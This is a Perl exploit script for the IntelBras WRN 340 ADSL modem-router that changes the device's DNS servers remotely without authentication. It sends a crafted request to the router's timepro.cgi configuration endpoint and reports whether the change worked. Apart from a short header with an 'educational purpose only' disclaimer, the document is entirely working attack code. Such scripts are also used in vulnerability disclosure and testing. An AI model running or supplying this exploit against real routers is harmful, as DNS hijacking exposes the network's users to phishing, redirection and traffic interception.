#!/usr/bin/perl # # IntelBras WRN 340 (ADSL Modem-Router) - Unauthenticated Remote DNS Change Exploit # # Discovered by: # # Gabriel P. Lipski - gp[DOT]lipski[AT]gmail[DOT]com # # Brazil, sept. 2015. # # # AVISO: # # Este codigo foi feito apenas para fins educacionais. # NAO USE SEM A PERMISSAO DO DONO DA REDE-ALVO. # Use por sua conta e risco! # # # WARNING: # # This program is for educational purpose only. # DO NOT USE IT WITHOUT PERMISSION OF TARGET-NETWORK OWNER. # Use at your own risk! use LWP::UserAgent; use HTTP::Request; if($#ARGV < 2){ print "IntelBras WRN 340 (ADSL Modem-Router) - Unauthenticated Remote DNS Change Exploit\n"; print "Usage: ./$0 <ip> <dns-1> <dns-2>\n"; exit; } if($ARGV[1] =~ /(.+)\.(.+)\.(.+)\.(.+)/){ $DNS1 = $1; $DNS2 = $2; $DNS3 = $3; $DNS4 = $4; } if($ARGV[2] =~ /(.+)\.(.+)\.(.+)\.(.+)/){ $DNS5 = $1; $DNS6 = $2; $DNS7 = $3; $DNS8 = $4; } $sock = new LWP::UserAgent; $sock->timeout(5); $http = new HTTP::Request GET => "http://".$ARGV[0]."/cgi-bin/timepro.cgi?tmenu=netconf&smenu=wansetup&act=save&sel=dynamic&dns_dynamic_chk=on&fdns_dynamic1=".$DNS1."&fdns_dynamic2=".$DNS2."&fdns_dynamic3=".$DNS3."&fdns_dynamic4=".$DNS4."&sdns_dynamic1=".$DNS5."&sdns_dynamic2=".$DNS6."&sdns_dynamic3=".$DNS7."&sdns_dynamic4=".$DNS8."&userid=&passwd=&mtu=1454&ip1=192&ip2=168&ip3=254&ip4=2&sm1=255&sm2=255&sm3=255&sm4=0&gw1=192&gw2=168&gw3=254&gw4=254&fdns1=&fdns2=&fdns3=&fdns4=&sdns1=&sdns2=&sdns3=&sdns4=&static_mtu=1500"; $response = $sock->request($http); if($response->content =~ /Definir Servidor DNS Manualmente/){ print "Successfully exploited!\n"; } else { print "Unknown error.\n"; }